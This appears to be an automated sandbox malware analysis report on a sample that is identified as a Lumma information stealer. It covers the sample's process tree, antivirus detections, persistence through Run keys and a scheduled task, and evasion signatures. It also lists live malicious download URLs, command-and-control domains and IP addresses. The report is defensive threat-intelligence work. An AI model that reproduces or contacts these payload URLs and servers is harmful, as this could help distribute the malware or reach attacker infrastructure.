weak emulator (self modifying code) 16->119 121 2 other signatures 16->121 27 skotes.exe 16->27         started        file6 signatures7 process8 dnsIp9 69 gamertool.eu 104.21.9.168, 443, 49845, 49855 CLOUDFLARENETUS United States 22->69 71 atten-supporse.biz 172.67.165.166, 443, 49782, 49788 CLOUDFLARENETUS United States 22->71 49 C:\Users\user\...\9DNEMG3H6COYF8VY.exe, PE32 22->49 dropped 93 Antivirus detection for dropped file 22->93 95 Detected unpacking (changes PE section rights) 22->95 97 Query firmware table information (likely to detect VMs) 22->97 107 8 other signatures 22->107 29 9DNEMG3H6COYF8VY.exe 1 5 22->29         started        99 Machine Learning detection for dropped file 27->99 101 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 27->101 103 Tries to evade debugger and weak emulator (self modifying code) 27->103 105 Potentially malicious time measurement code found 27->105 file10 signatures11 process12 file13 59 C:\Users\user\AppData\...59vidiaDriver.exe, PE32 29->59 dropped 123 Multi AV Scanner detection for dropped file 29->123 125 Creates multiple autostart registry keys 29->125 33 NvidiaDriver.exe 52 42 29->33         started        signatures14 process15 file16 45 C:\Users\user\AppData\...\InternetDriver.exe, PE32 33->45 dropped 47 C:\...\184f72cd859c47b29124ab7c76766326.exe, PE32 33->47 dropped 77 Multi AV Scanner detection for dropped file 33->77 79 Creates multiple autostart registry keys 33->79 37 184f72cd859c47b29124ab7c76766326.exe 33->37         started        41 InternetDriver.exe 33->41         started        signatures17 process18 dnsIp19 67 se-blurry.biz 104.21.81.153, 443, 49886, 49893 CLOUDFLARENETUS United States 37->67 89 Multi AV Scanner detection for dropped file 37->89 91 Machine Learning detection for dropped file 37->91 43 conhost.exe 37->43         started        signatures20 process21

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe100%AviraTR/Crypt.TPM.Gen
                        file.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe100%AviraTR/Crypt.XPACK.Gen
                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe78%ReversingLabsWin32.Spyware.Lummastealer
                        C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe33%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe78%ReversingLabsWin32.Spyware.Lummastealer
                        C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe78%ReversingLabsWin32.Spyware.Lummastealer
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        impend-differ.biz100%URL Reputationmalware
                        SourceDetectionScannerLabelLink
                        https://gamertool.eu/receive.php0%Avira URL Cloudsafe
                        https://se-blurry.biz/api100%Avira URL Cloudmalware
                        http://31.41.244.11/files/806475321/0tClIDb.exeRX100%Avira URL Cloudmalware
                        https://gamertool.eu/get_file.php0%Avira URL Cloudsafe
                        http://185.215.113.43/Zu7JuNko/index.phpdedt100%Avira URL Cloudmalware
                        https://se-blurry.biz/9100%Avira URL Cloudmalware
                        https://atten-supporse.biz/apiu(100%Avira URL Cloudmalware
                        https://gamertool.euD0%Avira URL Cloudsafe
                        https://atten-supporse.biz/J100%Avira URL Cloudmalware
                        http://31.41.244.11/files/806475321/0tClIDb.exeso~100%Avira URL Cloudmalware
                        https://gamertool.eu/GmdDriver.exe0%Avira URL Cloudsafe
                        https://gamertool.eu/LKSM.exe100%Avira URL Cloudmalware
                        http://185.215.113.43/Zu7JuNko/index.php29001100%Avira URL Cloudmalware
                        https://atten-supporse.biz/Y100%Avira URL Cloudmalware
                        http://31.41.244.11/files/806475321/0tClIDb.exe100%Avira URL Cloudmalware
                        https://gamertool.eu/get_updatT0%Avira URL Cloudsafe
                        https://gamertool.eu0%Avira URL Cloudsafe
                        https://gamertool.eu/v0%Avira URL Cloudsafe
                        https://gamertool.eu/s0%Avira URL Cloudsafe
                        https://gamertool.eu/t0%Avira URL Cloudsafe
                        https://gamertool.eu/LKSM.exe9G0%Avira URL Cloudsafe
                        https://gamertool.eu/get_update.php0%Avira URL Cloudsafe
                        http://185.215.113.43/Zu7JuNko/index.php3229001100%Avira URL Cloudmalware
                        https://atten-supporse.biz/g100%Avira URL Cloudmalware
                        https://atten-supporse.biz/apidjd100%Avira URL Cloudmalware
                        https://se-blurry.biz/apin100%Avira URL Cloudmalware
                        https://se-blurry.biz/h100%Avira URL Cloudmalware
                        https://se-blurry.biz/100%Avira URL Cloudmalware
                        https://atten-supporse.biz/api2100%Avira URL Cloudmalware
                        https://gamertool.eu/0%Avira URL Cloudsafe
                        https://atten-supporse.biz/z100%Avira URL Cloudmalware
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        gamertool.eu
                        104.21.9.168
                        truefalse
                          unknown
                          atten-supporse.biz
                          172.67.165.166
                          truefalse
                            high
                            se-blurry.biz
                            104.21.81.153
                            truefalse
                              high
                              impend-differ.biz
                              unknown
                              unknowntrue
                              • 100%, URL Reputation
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              dare-curbys.bizfalse
                                high
                                impend-differ.bizfalse
                                  high
                                  https://gamertool.eu/receive.phpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://se-blurry.biz/apitrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://gamertool.eu/get_file.phpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gamertool.eu/GmdDriver.exefalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  dwell-exclaim.bizfalse
                                    high
                                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                                      high
                                      zinc-sneark.bizfalse
                                        high
                                        formy-spill.bizfalse
                                          high
                                          https://gamertool.eu/LKSM.exefalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          se-blurry.bizfalse
                                            high
                                            covery-mover.bizfalse
                                              high
                                              https://atten-supporse.biz/apifalse
                                                high
                                                https://gamertool.eu/get_update.phpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                print-vexer.bizfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://185.215.113.43/Zu7JuNko/index.phpVskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/chrome_newtab0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://gcc.gnu.org/bugs/):184f72cd859c47b29124ab7c76766326.exe.10.drfalse
                                                        high
                                                        http://185.215.113.43/Zu7JuNko/index.phpTskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://atten-supporse.biz/apiu(0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://gamertool.euDNvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://31.41.244.11/files/806475321/0tClIDb.exeRXskotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://atten-supporse.biz/J0tClIDb.exe, 00000007.00000003.2515717399.00000000058A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://185.215.113.43/Zu7JuNko/index.phpdedtskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://se-blurry.biz/9184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837555765.00000000014DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://31.41.244.11/files/806475321/0tClIDb.exeso~skotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170tClIDb.exe, 00000007.00000003.2515793658.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2515650753.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492460365.00000000058E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://31.41.244.11/files/806475321/0tClIDb.exeskotes.exe, 00000006.00000002.2887135078.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2887135078.000000000151D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://185.215.113.43/Zu7JuNko/index.phpnuskotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://185.215.113.43/Zu7JuNko/index.php29001skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://atten-supporse.biz/Y0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/00tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/00tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0tClIDb.exe, 00000007.00000003.2492460365.00000000058C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://gamertool.eu/get_updatTNvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://support.mozilla.org/products/firefoxgro.all0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://gamertool.eu/v0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://gamertool.eu/tNvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://185.215.113.43/Zu7JuNko/index.php/skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://gamertool.eu/s0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://185.215.113.43/Zu7JuNko/index.phpUsersskotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://185.215.113.43/Localskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://gamertool.euNvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://gamertool.eu/LKSM.exe9G0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://185.215.113.43/skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://atten-supporse.biz/api;0tClIDb.exe, 00000007.00000003.2588731287.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl00tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://185.215.113.43/Zu7JuNko/index.php3229001skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      http://ocsp.rootca1.amazontrust.com0:0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160tClIDb.exe, 00000007.00000003.2515793658.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2515650753.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492460365.00000000058E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.ecosia.org/newtab/0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdva0tClIDb.exe, 00000007.00000002.2686408044.0000000005890000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://se-blurry.biz/apin184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837425187.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://ac.ecosia.org/autocomplete?q=0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://atten-supporse.biz/g0tClIDb.exe, 00000007.00000003.2491353787.0000000000C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://se-blurry.biz/h184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837555765.00000000014DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://se-blurry.biz/184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837425187.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  https://atten-supporse.biz/apidjd0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  http://185.215.113.43/dskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.micro184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://185.215.113.43/onesskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0tClIDb.exe, 00000007.00000002.2686408044.0000000005890000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.microsof0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://atten-supporse.biz/api20tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              http://185.215.113.43/Zu7JuNko/index.phpgskotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0tClIDb.exe, 00000007.00000003.2492460365.00000000058C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://atten-supporse.biz/0tClIDb.exe, 00000007.00000003.2540144728.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://gamertool.eu/0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678870606.000000000589A000.00000004.00000800.00020000.00000000.sdmp, 9DNEMG3H6COYF8VY.exe, 00000009.00000000.2678750378.0000000000722000.00000002.00000001.01000000.0000000A.sdmp, InternetDriver.exe.10.dr, NvidiaDriver.exe.9.dr, 9DNEMG3H6COYF8VY.exe.7.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://atten-supporse.biz/z0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      185.215.113.43
                                                                                                                                      unknownPortugal
                                                                                                                                      206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                      104.21.9.168
                                                                                                                                      gamertool.euUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      104.21.81.153
                                                                                                                                      se-blurry.bizUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      172.67.165.166
                                                                                                                                      atten-supporse.bizUnited States
                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                      31.41.244.11
                                                                                                                                      unknownRussian Federation
                                                                                                                                      61974AEROEXPRESS-ASRUfalse
                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1571005
                                                                                                                                      Start date and time:2024-12-08 18:04:05 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 8m 39s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:16
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:file.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/49@4/5
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 80%
                                                                                                                                      HCA Information:Failed
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target 0tClIDb.exe, PID 7872 because there are no executed function
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • VT rate limit hit for: file.exe
                                                                                                                                      TimeTypeDescription
                                                                                                                                      12:06:01API Interceptor883x Sleep call for process: skotes.exe modified
                                                                                                                                      12:06:16API Interceptor8x Sleep call for process: 0tClIDb.exe modified
                                                                                                                                      12:06:37API Interceptor1x Sleep call for process: 9DNEMG3H6COYF8VY.exe modified
                                                                                                                                      12:06:38API Interceptor1x Sleep call for process: NvidiaDriver.exe modified
                                                                                                                                      12:06:52API Interceptor2x Sleep call for process: 184f72cd859c47b29124ab7c76766326.exe modified
                                                                                                                                      17:04:57Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                      17:06:40AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run InternetDriver_64f63a88bdff4eefb01bb065932cd846 "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                                                                                                                                      17:06:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run InternetDriver_98c017189ac44e4caa3f411a0cc7df75 "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                                                                                                                                      17:06:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InternetDriver_3d05c516b5834b8dabc47ef19f64e664.lnk
